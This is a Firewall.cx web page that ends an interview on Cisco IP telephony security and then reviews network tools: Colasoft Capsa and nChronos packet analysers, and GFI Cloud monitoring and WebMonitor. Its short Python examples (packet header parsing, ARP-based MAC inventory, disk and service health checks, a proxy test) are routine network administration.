  • For softphones such as Cisco IP Communicator try and use extension mobility which gives an additional layer of security by enabling user to dial international numbers only when logged in to the right profile with right credentials
  • Disable PSTN-to-PSTN tromboning of calls if it is not required, or restrict it as per organizational policies
  • Where possible enable secure SIP trunks and SIP authorization for trunk registration with provider
  • Implement COR where possible at SRST gateways to discourage toll-fraud during an SRST event
  • Monitor usage of the enterprise UC solution by call billing and reporting software (e.g. CAR) on an ongoing basis to detect any specific patterns or any abnormal usage

Q6. A common implementation of Cisco IP Telephony is to install the VoIP Telephony network on a separate VLAN – the Voice VLAN, which has restricted access through access lists applied on a central layer-3 switch. Is this common practice adequate to provide basic-level of security?

Well, I wouldn’t just filter the traffic at Layer 3 with access-lists or just do VLAN segregation at layer 2 but also enable security features such as:

  • Port security
  • DHCP snooping
  • Dynamic ARP Inspection (DAI)
  • 802.1x
  • Trusted Relay Point (TRP)
  • Firewall zoning

and so on, throughout the network to ensure that legitimate endpoints in voice VLAN (whether hard phones or softphones) can get access to enterprise network and resources. While most of the aforementioned features can be enabled without any additional cost, it’s important to understand the impact of enabling these features in a production network as well as to ensure that they are in-line with the corporate/IP Telephony security policy of the enterprise.

Q7. If you were asked to examine a customer’s VoIP network for security issues, what would be the order in which you would perform your security checks? Assume Cisco Unified Communications Manager Express with IP Telephones (wired & wireless), running on Cisco Catalyst switches with multiple VLANs (data, voice, guest network etc) and Cisco Aironet access points with a WLC controller. Firewall and routers exist, with remote VPN teleworkers

My first step towards assessing the security of the customer’s voice network will be to ask them for any recent or noted security incidents as it will help me understand where and how the incident could have happened and what are the key security breach or threats I should be looking at apart from the overall assessment.

I would then start at the customer’s security policy which can be a corporate security policy or an IP Telephony specific security policy to understand how they position security of enterprise/SMB communications in-line with their business processes. This is extremely important as, without proper information on what their business processes are and how security aligns with them I cannot advise them to implement the right security controls at the right places in the network. This also ensures that the customer’s business as usual is not interrupted when security is applied to the call-control, endpoints, switching infrastructure, wireless infrastructure, routing infrastructure, at firewall level, and for telecommuters.

Once I have enough information about the customer's network and security policy, I will start by inspecting the configuration of the access switches, moving down to distribution, core and data centre access. I will look at the WLC and WAP configurations next, followed by the IOS router and firewall configurations.

Once done at network level, I will continue the data collection and analysis at CUCME end. This will be followed by an analysis of the endpoints (wired and wireless) as well as softphones for telecommuters.

At this point, I should have enough information to conduct a security assessment and provide a report/feedback to the customer and engage with the customer in a discussion about the opportunities for improvement in their security posture and construct to defend against the threats and security risks pertinent to their line of business.

Q8. At Firewall.cx, we are eagerly looking forward to our liaison with you, as a CCIE and as an expert on Cisco IP Telephony. To all our readers and members, what would be your message for all those who want to trace your footsteps towards a career in Cisco IP Telephony?

I started in IT industry almost a decade ago with Linksys support (a division of Cisco Systems). Then I worked with Cisco TAC for a couple of years in the security and AVVID teams, which gave me a real view and feel of things from both security and telephony domains. After Cisco TAC I joined the Cisco Advanced Services (AS) team where I was responsible for Cisco’s UC and security portfolio for customer facing projects. From thereon I managed a team of consultants. On the way I did CCNA, CCVP, CCSP, CCDP, and many other Cisco specialist certifications to enhance my knowledge and worked towards my first CCIE which was in Voice and my second CCIE which was in Security. I am a co-lead of Cisco AS UC Security Tiger Team and have been working on a ton of UC Security projects, consulting assignments, workshops, knowledge transfer sessions, and so on.

It’s almost two years ago when I decided to write a book on the very subject of my interest that is – UC/IP Telephony security. As I mentioned earlier in this interview, I felt there was a dire need of a title which could bridge the otherwise prominent gap between UC and Security domains.

My advice to anyone who wishes to make his/her career in the Cisco IP Telephony domain is: ensure your basics are strong, as products may change and morph forms, but the basics will always remain the same. Always be honest with yourself and do what it takes to ensure that you complete your work/assignment, keeping in mind the balance between your professional and personal life. Lastly, do self-training or get training from Cisco/Partners on new products or services to ensure you are keeping up with the trends and changes in Cisco's collaboration portfolio.

  • Hits: 34733

Software Review: Colasoft Capsa 7 Enterprise Network Analyzer

Reviewer: Arani Mukherjee

review-100-percent-badgeColasoft Capsa 7.2.1 Network Analyser was reviewed by Firewall.cx a little more than a year ago. In that year Colasoft has managed to bring out the latest version of the analyser software, Version 7.6.1.

As a packet analyser, Colasoft Capsa Enterprise has already collected many accolades from users and businesses, so I will refrain from turning this latest review into a comparison between the two versions. Since Colasoft has made the effort to give us a new version of well-established software, it's only fair that I review it in its own light. This only goes to prove that the new release is not just an upgraded version of the old one, but a heavyweight analyser in its own right.

capsa enterprise v7.1 review

As an effective packet analyser, Capsa performs a range of functions: detecting network issues, intrusion and misuse; isolating network problems; monitoring bandwidth usage and data in motion; supporting endpoint security; and serving as a day-to-day primary data source for network monitoring and management. Capsa is one of the best-known packet analysers available today, and the reasons it occupies such an enviable position in the networking world are its simplicity of deployment, usage and data representation. Let's now put Capsa under the magnifying glass to better understand why it's one of the best you can get.

colasoft Capsa enterprise traffic chart

Installing Colasoft Capsa Enterprise

I have mentioned before that I will not use this as an opportunity for comparison between the two versions. However, I must admit, Capsa has retained all the merits displayed in the older version. This is welcome, as I have often witnessed newer versions of software suddenly abandoning certain features just after users have got used to them. In light of that, the first notable thing is the ease of installation. It was painless from the moment you download the full version or the demo copy until you enter the license key information and activate it online. There are other ways of activating it, but as a network manager why would you install a packet analyser on a machine which has no network connection?

It takes 5-7 minutes to get the software up and running to the point where you can start collecting data about your network. It carries all the hallmarks of a seamless, easy installation and deployment, and for all of us, that's one less thing to worry about. Bearing in mind some of you might have seen an ad hoc review of this software while Colasoft's nChronos Server was being reviewed, I will try not to repeat myself.

Using Capsa Enterprise

You will be greeted with a non cluttered well designed front screen as displayed below.

The default view is the first tab, called Dashboard. Once you have selected which adapter you want to monitor (and you can have several sessions based on what you do), you hit the 'Start' button to start collecting data. The Dashboard then starts filling with data as it is gathered. The next screenshot shows what your dashboard will end up looking like:

packet sniffing main console traffic analyzer

Every tab on this software will display data based on what you want to see. In the Node Explorer on the left you can select either a full analysis or particular analysis based on either protocol, the physical nodes or IP nodes.

The Total Traffic Graph is a live progressing chart which can update its display as fast as every 1 second, or as slowly as every hour. If you don't fancy the progressing line graph, you can ponder the bar chart at the bottom. For your benefit you can pause the live flow of the graph by right-clicking and selecting 'Pause Refresh', as shown below:

capsa enterprise main interface

The toolbar at the top needs particular mention because of the features it provides. My favourites were obviously the Utilisation and PPS meters. I forced a download from an FTP site and captured how the needles reacted. Also note the traffic chart, which captured bytes per second. The needle position updated every second:

colasoft capsa traffic

The Summary tab is there to provide the user with a full statistical analysis of the network traffic. The separate sections are self-explanatory and provide in-depth metadata.

The Diagnosis tab is of particular interest. It gives a full range view of what’s happening to the data in the network in terms of issues encountered:

capsa enterprise protocol diagnosis

The diagnosis is separated in terms of the actual layers, severity and event description. This I found to be very useful when defining the health of my network.

The Protocol tab gave me a ringside view of the protocols that were topping the list and what was responsible for what chunk of data flowing through the network. I deemed it useful when I wanted to find out who’s been downloading too much using FTP, or who has set up a simultaneous ping test of a node.

Physical and IP Endpoints tabs showed data conversations happening between the various nodes in my network. I actually used this feature to isolate two nodes which were responsible for a sizeable chunk of the network traffic within a LAN. A feature I’m sure network managers will find useful.

The Physical, IP, TCP, and UDP Conversations tabs are purely an expanded form of the information provided at the bottom of the previous two tabs.

My favourite tab was the Matrix, not just because of the name but because of what it displayed. Every data transfer and its corresponding links were mapped based on IP nodes or physical nodes. You also have the luxury of only seeing the top 100 in each of these categories. Here's a screenshot of my network in full bloom, the top 100 physical conversations:

colasoft capsa matrix analysis

The best display for me was when I selected Top 100 IPv4 Conversations and hovered the mouse over one particular conversation. Not only did Capsa tell me how many peers it was conversing with, it also showed me how many packets were received and sent:

review-capsa-enterprisev7-7

Further on, the Packet tab is quite self-explanatory. It shows every packet spliced into its various protocol and encapsulation components. This is one part that definitely makes me feel like a crime scene investigator, a feeling I also had while reviewing nChronos. It also helps in understanding how a packet is built and transferred across a network. Here's a screenshot of one such packet:

capsa enterprise packet view

As shown above, the level of detail is exhaustive. I wish I’d had this tool when I was learning about packets and their structure. This would have made my learning experience a bit more pleasurable.
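
To give a feel for what a decoder like this does with the first couple of layers, here is a minimal Python sketch that splits a raw Ethernet frame into the same kind of fields Capsa displays. It is purely illustrative, handles only Ethernet plus a basic IPv4 header, and uses a hand-crafted sample frame:

```python
import struct


def parse_ethernet_ipv4(frame: bytes):
    """Split a raw Ethernet frame into the layers a packet decoder displays."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    layers = {
        "eth.dst": dst.hex(":"),
        "eth.src": src.hex(":"),
        "eth.type": hex(ethertype),
    }
    if ethertype == 0x0800:  # IPv4 payload
        ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, checksum, s, d = \
            struct.unpack("!BBHHHBBH4s4s", frame[14:34])
        layers.update({
            "ip.version": ver_ihl >> 4,
            "ip.header_len": (ver_ihl & 0x0F) * 4,
            "ip.total_len": total_len,
            "ip.ttl": ttl,
            "ip.protocol": proto,          # 6 = TCP, 17 = UDP
            "ip.src": ".".join(map(str, s)),
            "ip.dst": ".".join(map(str, d)),
        })
    return layers


if __name__ == "__main__":
    # A hand-crafted example frame: Ethernet header + minimal IPv4 header
    sample = (bytes.fromhex("ffffffffffff") + bytes.fromhex("001122334455") +
              bytes.fromhex("0800") +
              bytes.fromhex("4500001c000100004011f96bc0a80101c0a801fe"))
    for field, value in parse_ethernet_ipv4(sample).items():
        print(f"{field:15} {value}")
```

A real analyser of course decodes dozens of protocols and validates checksums, but the layer-by-layer unpacking shown above is the essence of what the Packet tab presents.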

All of this is just under the Analysis section. Under the Tools section, you will find very useful applications like the Ping and the MAC Scanner. For me, the MAC Scanner was very useful as I could take a snapshot of all MAC addresses and then be able to compare any changes at a later date. This is useful if there is a change in any address and you are not aware of it. It could be anything from a network card change to a new node being added without you knowing.
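
Taking such a MAC snapshot is easy to reproduce in code. The sketch below uses the third-party Scapy library (our assumption for illustration only; this is not how Capsa's scanner is built) to broadcast ARP requests across a subnet, which is hypothetical here, and record which IP answered from which MAC address:

```python
# pip install scapy; ARP scanning usually needs administrator/root rights
from scapy.all import ARP, Ether, srp


def arp_scan(subnet="192.168.1.0/24", timeout=2):
    """Return a list of (ip, mac) pairs that answered an ARP broadcast."""
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=subnet)
    answered, _ = srp(broadcast, timeout=timeout, verbose=False)
    return [(reply.psrc, reply.hwsrc) for _, reply in answered]


if __name__ == "__main__":
    for ip, mac in sorted(arp_scan()):
        print(f"{ip:15} {mac}")
```

Saving this output and diffing it against a later run is exactly the kind of comparison described above: any new or changed MAC address stands out immediately.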

I was pleasantly surprised by the level of flexibility of this software when it came to how you wish to see the data. There is the option to have your own charts, add filters against protocols to ignore data that is not important, and create alarm conditions which will notify you if a threshold is met or broken. A key feature for me was being able to store packet data and play it back later using the Packet Player, another nice tool in the Tools section. This historical lookup facility is essential for any comparison that needs to be performed after a network issue has been dealt with.

Summary

I have worked with several packet and network analysers and I have to admit Capsa Enterprise captures data and displays it in the best way I have seen. My previous experiences were marred by features that were absent and features that didn't work or deliver the expected outcome. Colasoft has done a brilliant job of delivering a product that meets all my expectations. This software is not only helpful for network managers but also for students of computer networking. I definitely would have benefitted from Capsa had I known about it back then, but I do now. This tool puts network managers more in control of their networks and gives them that much-needed edge for data interpretation. I would tag it with a 'Highly Recommended' logo.

 

  • Hits: 28897

Cloud-based Network Monitoring: The New Paradigm - GFI Free eBook

review-gfi-first-aid-kit-1GFI has once again managed to make a difference: They recently published a free eBook named "Cloud-based network monitoring: The new paradigm" as part of their GFI Cloud offerings.

IT managers face numerous challenges when deploying and managing applications across their network infrastructure. Cloud computing and cloud-based services are the way forward.

This 28 page eBook covers a number of important key-topics which include:

  • Traditional Network Management
  • Cloud-based Network Monitoring: The new Paradigm
  • Big Challenges for Small Businesses
  • A Stronger Defense
  • How to Plan Ahead
  • Overcoming SMB Pain Points
  • The Best Tools for SMBs
  • ...and much more!

This eBook is no longer offered by the vendor. Please visit our Security Article section to gain access to similar articles.

  • Hits: 13635

GFI Network Server Monitor Online Review - Road Test

Reviewer: Alan Drury

review-100-percent-badgeThere’s a lot of talk about ‘the cloud’ these days, so we were intrigued when we were asked to review GFI’s new Cloud offering. Cloud-based solutions have the potential to revolutionise the way we work and make our lives easier, but can reality live up to the hype? Is the future as cloudy as the pundits say? Read on and find out.

What is GFI Cloud?

GFI Cloud is a new service from GFI that provides anti-virus (VIPRE) and workstation/server condition monitoring (Network Server Monitor Online) via the internet. Basically you sign up for GFI Cloud, buy licenses for the services you want and then deploy them to your internet-connected machines no matter where they are. Once that’s done, as long as you have a PC with a web browser you can monitor and control them from anywhere.

In this review we looked at GFI Network Server Monitor Online, but obviously to do that we had to sign up for GFI Cloud first.

Installation of GFI Network Server Monitor Online

Installation is quick and easy; so easy in fact that there’s no good reason for not giving this product a try. The whole installation, from signing up for our free 30-day trial to monitoring our first PC, took barely ten minutes.

To get started, simply follow the link from the GFI Cloud product page and fill in your details:

gfi-network-server-monitor-cloud-1

Next choose the service you’re interested in. We chose Network Server Monitor Online:

gfi-network-server-monitor-cloud-2

Then, after accepting the license agreement, you download and run the installer and that’s pretty much it:

gfi-network-server-monitor-cloud-3

Your selected GFI Cloud products are then automatically monitoring your first machine – how cool is that?

Below is a screenshot of the GFI Cloud desktop. The buttons down the left-hand side and the menu bar across the top let you view the output from either Server Monitor or VIPRE antivirus or, as shown here, you can have a status overview of your whole estate.

gfi-network-server-monitor-cloud-4

We’ve only got one machine set up here but we did add more, and a really useful touch is that machines with problems always float to the top so you need never be afraid of missing something. There’s a handy Filters box through which you can narrow down your view if required. You can add more machines and vary the services running on them, but we’ll come to that later. First let’s have a closer look at Network Server Monitor Online.

How Does It Work?

Network Server Monitor Online uses the GFI Cloud agent installed on each machine to run a series of health checks and report the results. The checks are automatically selected based on the type of machine and its OS. Here’s just a sample of those it applied to our tired XP laptop:

As well as the basics like free space on each of the volumes there’s a set of comprehensive checks to make sure the essential Windows services are running, checks for nasties being reported in the event logs and even a watch on the SMART status of the hard disk.
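
To make the nature of these checks concrete, here is a rough Python sketch using the third-party psutil library. It is purely illustrative of the style of check described above, not GFI's agent; the free-space threshold and the service names are hypothetical:

```python
import psutil  # third-party: pip install psutil

FREE_SPACE_THRESHOLD = 10   # alert below 10% free (hypothetical threshold)
ESSENTIAL_SERVICES = {"Dnscache", "LanmanServer", "EventLog"}  # illustrative names


def check_disks():
    """Return warnings for any volume running low on free space."""
    warnings = []
    for part in psutil.disk_partitions(all=False):
        try:
            usage = psutil.disk_usage(part.mountpoint)
        except OSError:
            continue  # e.g. empty removable drives
        free_pct = 100 - usage.percent
        if free_pct < FREE_SPACE_THRESHOLD:
            warnings.append(f"{part.mountpoint}: only {free_pct:.1f}% free")
    return warnings


def check_services():
    """Return warnings for essential Windows services that are not running."""
    warnings = []
    for svc in psutil.win_service_iter():  # Windows only
        if svc.name() in ESSENTIAL_SERVICES and svc.status() != "running":
            warnings.append(f"service {svc.name()} is {svc.status()}")
    return warnings


if __name__ == "__main__":
    problems = check_disks() + check_services()
    print("\n".join(problems) if problems else "All checks passed")
```

A monitoring agent simply runs checks of this kind on a schedule and reports the results to a central console, which is what GFI Cloud's dashboard, email and SMS alerts build on.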

If these aren’t enough you can add your own similar checks and, usefully, a backup check:

gfi-network-server-monitor-cloud-6

This really is nice – the product supports lots of mainstream backup suites and will integrate with the software to check for successful completion of whatever backup regime you’ve set up. If you’re monitoring a server then that onerous daily backup check is instantly a thing of the past.

As well as reporting into the GFI Cloud desktop each check can email you or, if you add your number to your cloud profile, send you an SMS text alert. So now you can relax on your sun lounger and sip your beer safe in the knowledge that if your phone’s quiet then all is well back at the office.

Adding More Machines To GFI Network Server Monitor Online

gfi-network-server-monitor-cloud-7

Adding more machines is a two-step process. First you need to download the agent installer and run it on the machine in question. There’s no need to log in; the installer knows who you are, so you can do a silent push installation and everything will be fine. GFI Cloud can also create a Group Policy installer for deployment to multiple workstations and servers. On our XP machine the agent took only 11k of RAM and there was no noticeable performance impact on any of the machines we tested.

Once the agent’s running the second step is to select the cloud service(s) you want to apply:

gfi-network-server-monitor-cloud-8

When you sign up for GFI Cloud you purchase a pool of licenses, and applying one to a machine is as simple as ticking a box and almost as quick – our chosen product was up and running on the target machine in less than a minute.

This approach gives you amazing flexibility. You can add services to and remove them from your machines whenever you like, making sure that every one of your purchased licenses is working for you. It’s also scalable – you choose how many licenses to buy so you can start small and add more as you grow. Taking the license off a machine doesn’t remove it from GFI Cloud (it just stops the service) so you can easily put it back again, and if a machine is ever lost or scrapped you can retrieve its licenses and use them somewhere else. Quite simply, you’re in control.

Other Features

Officially this review is about Network Server Monitor Online, but by adding a machine into GFI Cloud you also get a comprehensive hardware and software audit. This is quite useful in itself but when coupled with Network Server Monitor Online it tells you almost everything you need to know:

gfi-network-server-monitor-cloud-9

On top of this you can reboot machines remotely and see at a glance which machines have been shut down or, more ominously, are supposed to be up but aren’t talking to the cloud.

The whole thing is very easy to use but, should you need it, the documentation is excellent and you can even download a free e-book to help you on your way.

In Conclusion

What GFI has done here is simply brilliant. For a price that even the smallest organisation can afford you get the kind of monitoring, auditing and alerting that you know you need but think you don’t have the budget for. Because it’s cloud-based it’s also a godsend for those with numerous locations or lots of home-workers and road warriors. The low up-front cost and the flexible, scalable, pay-as-you-go licensing should please even the most hard-bitten financial director. And because it’s so easy to use it can sit there working for you in the background while you get on with other things.

Could it be improved? Yes, but even as it stands this is a solid product that brings reliable and useful monitoring, auditing and alerting within the reach of those who can’t justify the expense of dedicated servers and costly software. GFI is on a winner here, and for that reason we’re giving GFI Cloud and GFI Network Server Monitor Online the coveted Firewall.cx ten-out-of-ten award.


Colasoft: nChronos v3 Server and Console Review

Reviewer: Arani Mukherjee

review-100-percent-badge

nChronos, a product of Colasoft, is one of the cutting-edge packet/network analysers the market has to offer today. What Colasoft promises through their creation is end-to-end, round-the-clock packet analysis coupled with historical network analysis. nChronos provides an enterprise network management platform which enables users to troubleshoot, diagnose and address network security and performance issues. It also allows retrospective network analysis and, as stated by Colasoft, will “provide forensic analysis and mitigate security risks”. Understandably, it is a must-have for anyone involved with network management and security.

Packet analysis has been at the forefront for a while, used for network analysis, detection of network intrusion, spotting misuse, isolating exploited systems, monitoring network and bandwidth usage, checking endpoint security status, verifying adds, moves and changes, and various other such needs. There are quite a few players in this field and, for me, it boils down to some key unique selling points. I will lay out the assessment using criteria such as ease of installation, ease of use and unique selling points and, based on all of the aforementioned, how it stacks up against the competition.

Ease of Installation - nChronos Installation

The installation instructions for both nChronos Server and Console are straightforward. You install the server first, followed by the console. Setting up the server was easy enough. The only snag I encountered was when I tried to log onto the server for the first time. The shortcut created by default opens the web interface in the default web browser, but it calls ‘localhost’ as the primary link for the server, which brings up the default web page of the physical server on which nChronos Server was installed. I was a bit confused when the home page of my web server came up instead of what I was expecting. One look into the online help files, however, and the reference on this topic said to try ‘localhost:81’ and, if that doesn’t work, ‘localhost:82’. The first option worked straight away, so I promptly changed the nChronos Server shortcut to point to ‘localhost:81’. Voilà, all was good. The rest of the configuration was extremely smooth, and the run of events followed exactly what was said in the instruction manual. For some reason, at the end of the process the nChronos server is meant to restart; if you receive an error message along the lines of the server not being able to restart, it’s possibly a glitch - the server restarted just fine, as I found out later. I went ahead and tried the various installation scenarios mentioned and all of them worked just as well.

Once the server was up and running, I proceeded to install the nChronos Console, which was also straightforward. It worked the first time, every time. With the least effort I was able to link up the console with the server and start checking out the console features. And yes, don’t forget to turn the monitoring on for the network interfaces you need to manage. You can do that either from the server or from the console itself. So all in all, the installation process passed with some high grades.

Ease Of Use

Just before starting to use the software I was getting a bit apprehensive about what I needed to include in this section. First I thought I would go through the explanation of how the software works and elaborate on the technologies used to render the functionalities provided. But then it occurred to me that it would be redundant for me to expand on all of that because this is specialist software. The users of this type of software are already aware of what happens in the background and are well versed with the technicalities of the features. I decided to concentrate on how effectively this software helps me perform the role of network management, packet tracing and attending to issues related to network security.

The layout of the nChronos Server is very simple and I totally agree with Colasoft’s approach of a no nonsense interface. You could have bells and whistles added but they would only enhance the cosmetic aspect of the software, adding little or nothing to its function.

colasoft nchronos server administration

The screenshot above gives you an idea of what the Server Administration page looks like; it is the first page that opens once the user has logged in, and is the System Information page. In the left pane you will find several other pages to look at: Basic Settings, which displays default port info and HDD info for the host machine; User Account (the name says it all); and Audit Log, which shows the audit trail of user activity.

The interesting page to look at is Network Link. This is where the actual interfaces to be monitored are added. The screenshot below shows this page:

colasoft nchronos network link

Obviously, for the purpose of this review the only NIC registered on the server was the NIC of my own machine. This is the page from which you can start monitoring the various network interfaces all over your network. Packet data for a NIC will not be captured until you have clicked the ‘Start’ button for that specific NIC. So don’t go blaming the car for not starting when you haven’t even turned the ignition key!

All in all, it’s simple and it’s effective, as it gives you fewer chances of making errors.

Now that the server is all up and running we use the nChronos Console to peer into the data that it is capturing:

colasoft nchronos network console

The above screenshot shows the console interface. For the sake of simplicity I have labelled three separate zones: 1, 2 and 3. When the user logs in for the first time, he/she has to select the interface to be examined from Zone 2 and click the ‘Open’ button. That then shows all the details about that interface in Zones 1 and 3. Notice in Zone 1 there is a strip of buttons, one of which is the auto-scroll feature. I loved this feature as it helps you see traffic as it passes through. To see a more detailed data analysis you simply click, drag and release the mouse button to select a time frame. This unleashes a spectrum of relevant information in Zone 3. Each tab displays the packets captured through a category window, e.g. the Application tab shows the types of application protocols that have been used in that time frame (HTTP, POP, etc.).

One of the best features I found was the ability to drill into each line of data under any tab by just double-clicking on it. So if I double-clicked the link on the Application tab that says HTTP, it would drill down to IP Address. I could keep on drilling down and it would traverse from HTTP → IP Address → IP Conversation → TCP Conversation. I can jump to any specific drill-down state by right-clicking on the application protocol itself and making a choice from the right-click menu. This is a very useful feature. For the more curious, the little spikes in traffic in Zone 1 were my mail application checking for new mail every 5 seconds.

The magic happens when you right click on any line of data and select ‘Analyse Packet’. This invokes the nChronos Analyzer:

colasoft nchronos packet analyzer

The above screenshot shows what the Analyzer looks like by default. This was by far my favourite tool. The way the information about the packets was presented was just beyond belief; this is one example where Colasoft has shown one of its many strengths, combining flamboyance with function. The list of tabs along the top will give you an idea of how many ways the Analyzer can show you the data you want to see. Some of my favourites are described below, starting with the Protocol tab:

colasoft nchronos analysis

This is a screenshot of the Protocol tab. I was impressed by the number of column headers used to show detailed information about the packets. The tree-like, expanded way of showing protocols under particular data units, based on the layers involved, was useful.

Another one of my favourite tabs was the Matrix:

colasoft nchronos network matrix

The utility of this tab is to show the top 100 end-to-end conversations, which can be IP conversations, physical conversations etc. If you double-click any of the lines denoting a conversation it opens up the actual data exchange between the nodes. This is very important for a network manager who needs to decipher exactly what communication was taking place between two nodes, be it physical or IP, at a given point in time. It can be helpful in terms of checking for network abuse, intrusions etc.

This brings me to my favourite tab of all, the Packet tab. This tab shows you the end-to-end data being exchanged between any two interfaces and exactly what that data contained. I know that the primary function of most packet analyzers is to do exactly that, but I like Colasoft’s treatment of this functionality:

colasoft nchronos packet analysis

I took the liberty of breaking the screen into three zones to show how easy it was to delve into any packet. In Zone 1, you select exactly which exchange of data between the nodes concerned you want to dissect. Once you have done that, Zone 2 shows the packet structure in terms of the different network layers, i.e. Data Link Layer, Network Layer, Transport Layer, Application Layer etc. Then Zone 3 shows you the actual data that was encapsulated inside that specific packet. This is by far the most lucid and practical approach I have seen from any packet analyzer software when showing encapsulated data within packets. I kid you not, I have seen many packet analyzers and Colasoft trumps the lot.

Summary

Colasoft’s unique selling points will always remain simplicity, careful positioning of features to give users easy access, presentation of data in an uncluttered way for maximum usefulness and, especially for me, making me feel like a Crime Scene Investigator of networks, like you might see on CSI: Las Vegas (apologies to anyone who hasn’t seen the CSI series).

Network security has become of paramount importance in our daily lives as more and more civil, military and scientific work and facilities become dependent on networks. For a network administrator it is not only important to restore normal network operations as soon as possible but also to go back and successfully investigate why an event capable of crippling a network happened in the first place. The same applies to preventing such a disruptive event.

Colasoft’s nChronos Server and Console, coupled with the Analyzer, form an assorted bundle of efficient software which helps to perform all the functions required to preserve network integrity and security. It is easy to set up and maintain, requires minimum intervention when it’s working and delivers vast amounts of important information in the easiest manner possible. This software bundle is a must-have for any organisation which, for all the right reasons, values its network infrastructure highly and wants to preserve its integrity and security.


GFI WebMonitor 2012 Internet Web Proxy Review

Review by Alan Drury and John Watters

review-badge-98

The Internet connection is vital for small, medium and large enterprises alike, but it can also be one of the biggest headaches. How can you know who is doing what? How can you enforce a usage policy? And how can you protect your organisation against internet-borne threats? Larger companies tend to have sophisticated firewalls and border protection devices, but how do you protect yourself when your budget won’t run to such hardware? This is precisely the niche GFI has addressed with GFI WebMonitor.

How Does GFI WebMonitor 2012 Work?

Before we get into the review proper it’s worth taking a few moments to understand how it works. GFI WebMonitor installs onto one of your servers and sets itself up there as an internet proxy. You then point all your browsers to the internet via that proxy and voilà – instant monitoring and control.

The server you choose doesn’t have to be internet-facing or even dual-homed (although it can be), but it does obviously need to be big enough and stable enough to become the choke point for all your internet access. Other than that, as long as it can run the product on one of the supported Microsoft Windows Server versions, you’re good to go.

We tested it in an average company with a reasonable number of PCs, laptops and mobile clients (phones), running on a basic ADSL internet connection and a dual-core Windows 2003 Server box that was doing everything, including being the domain controller and the print server in its spare time, and happily confirmed there was no performance impact on the server.

Installing GFI WebMonitor 2012

As usual with GFI we downloaded the fully functional 30-day evaluation copy (82Mb) and received the license key minutes later by email. On running the installer we found our humble server lacked several prerequisites but happily the installer went off and collected them without any fuss.

review-gfi-webmonitor2012-1

After that it offered to check for updates to the program, another nice touch:


The next screen is where you decide how you want to implement the product. Having just a single server with a single network card we chose single proxy mode:

review-gfi-webmonitor2012-3

With those choices made the installation itself was surprisingly quick and before long we were looking at this important screen:

review-gfi-webmonitor2012-4

We reconfigured several user PCs to point to our newly-created http proxy and they were able to surf as if nothing had happened. Except, of course, for the fact that we were now in charge!
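If you want to script a quick sanity check that a client really is going out through the new proxy, something like the following works; the server name and port are hypothetical, so substitute whatever you configured during installation:

```python
# Quick check that HTTP requests really flow through the WebMonitor proxy.
# The proxy host and port below are hypothetical.
import requests

PROXIES = {
    "http": "http://webmonitor-server:8080",
    "https": "http://webmonitor-server:8080",
}

resp = requests.get("http://www.firewall.cx/", proxies=PROXIES, timeout=10)
print(resp.status_code, len(resp.content), "bytes fetched via the proxy")
```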

We fired off a number of web accesses (to www.Firewall.cx of course, among others) and some searches, then clicked Finish to see what the management console would give us.

WebMonitor 2012 - The All-Seeing Eye

The dashboard overview (above) displays a wealth of information. At a glance you can see the number of sites visited and blocked along with the top users, top domains and top categories (more on these later).  There’s also a useful trending graph which fills up over time, and you can change the period being covered by the various displays using the controls in the top right-hand corner. The console is also web-based so you can use it remotely.

review-gfi-webmonitor2012-5

Many of the displays are clickable, allowing you to easily drill down into the data, and if you hover the mouse you’ll get handy pop-up explanations. We were able to go from the overview to the detailed activities of an individual user with just a few clicks. A user here is a single source IP, in other words a particular PC rather than the person using it. Ideally we would have liked the product to query the Active Directory domain controller and nail down the actual logged-on user but, to be honest, given the reasonable price and the product’s undoubted usefulness we’re not going to quibble.

The other dashboard tabs help you focus on particular aspects. The Bandwidth tab (shown below) and the Activity tab let you trend the activity either by data throughput or by the number of sessions, as well as giving you peaks, totals and future projections. The Real-Time Traffic tab shows all the sessions happening right now and lets you kill them, and the Quarantine tab lists the internet nasties that WebMonitor has blocked.

review-gfi-webmonitor2012-6

To the right of the dashboard, the reports section offers three pages of ad-hoc and scheduled reports that you can either view interactively or have emailed to you. You can pretty much get anything here: the bandwidth wasted by non-productive surfing during a time period; the use of social networking sites and/or webmail; the search engine activity; the detailed activity of a particular user and even the use of job search websites on company time.

review-gfi-webmonitor2012-7

Underlying all this is a huge database of site categories. This, along with the malware protection, is maintained by GFI and downloaded daily by the product as part of your licensed support so you’ll need to stay on support moving forward if you want this to remain up to date.

The Enforcer

Monitoring, however, is only half the story and it’s under the settings section that things really get interesting.  Here you can configure the proxy (it can handle https if you give it a certificate and it also offers a cache) and a variety of general settings but it’s the policies and alerts that let you control what you’ve been monitoring.

review-gfi-webmonitor2012-8

By defining policies you can restrict or allow all sorts of things, from downloading to instant messaging to categories of sites allowed or blocked and any time restrictions. Apply the relevant policies to the appropriate users and there you go.

The policies are quite detailed. For example, here’s the page allowing you to customise the default download policy. Using the scrolling list you can restrict a range of executables, audio/video files, document types and web scripts and if the default rules don’t meet your needs you can create your own. You can block them, quarantine them and generate an alert if anyone tries to do what you’ve forbidden.

review-gfi-webmonitor2012-9

Also, hidden away under the security heading is the virus scanning policy. This is really nice - GFI WebMonitor can scan incoming files for you using several anti-virus, spyware and malware detectors and will keep these up to date. This is the part of the program that generates the list of blocked nasties we mentioned earlier.

Pull down the monitoring list and you can set up a range of administrator alerts ranging from excessive bandwidth through attempted malware attacks to various types of policy transgression. By using the policies and alerts together you can block, educate or simply monitor across the whole spectrum of internet activity as you see fit.

review-gfi-webmonitor2012-10

Final Thoughts

GFI WebMonitor is a well thought-out, tightly focussed and well integrated product that provides everything a small to large-sized enterprise needs to monitor and control internet access at a reasonable price. You can try it for free and the per-seat licensing model means you can scale it as required. It comes with great documentation both for reference and to guide you as you begin to take control.

 


Product Review - GFI LanGuard Network Security Scanner 2011

review-gfi-languard2011-badge
Review by Alan Drury and John Watters

Introduction

With LanGuard 2011 GFI has left behind its old numbering system (this would have been Version 10), perhaps in an effort to tell us that this product has now matured into a stable and enterprise-ready contender worthy of  serious consideration by small and medium-sized companies everywhere.

Well, after reviewing it we have to agree.

In terms of added features the changes here aren’t as dramatic as they were between say Versions 8 and 9, but what GFI have done is to really consolidate everything that LanGuard already did so well, and the result is a product that is rock-solid, does everything that it says on the tin and is so well designed that it’s a joy to use.

Installation

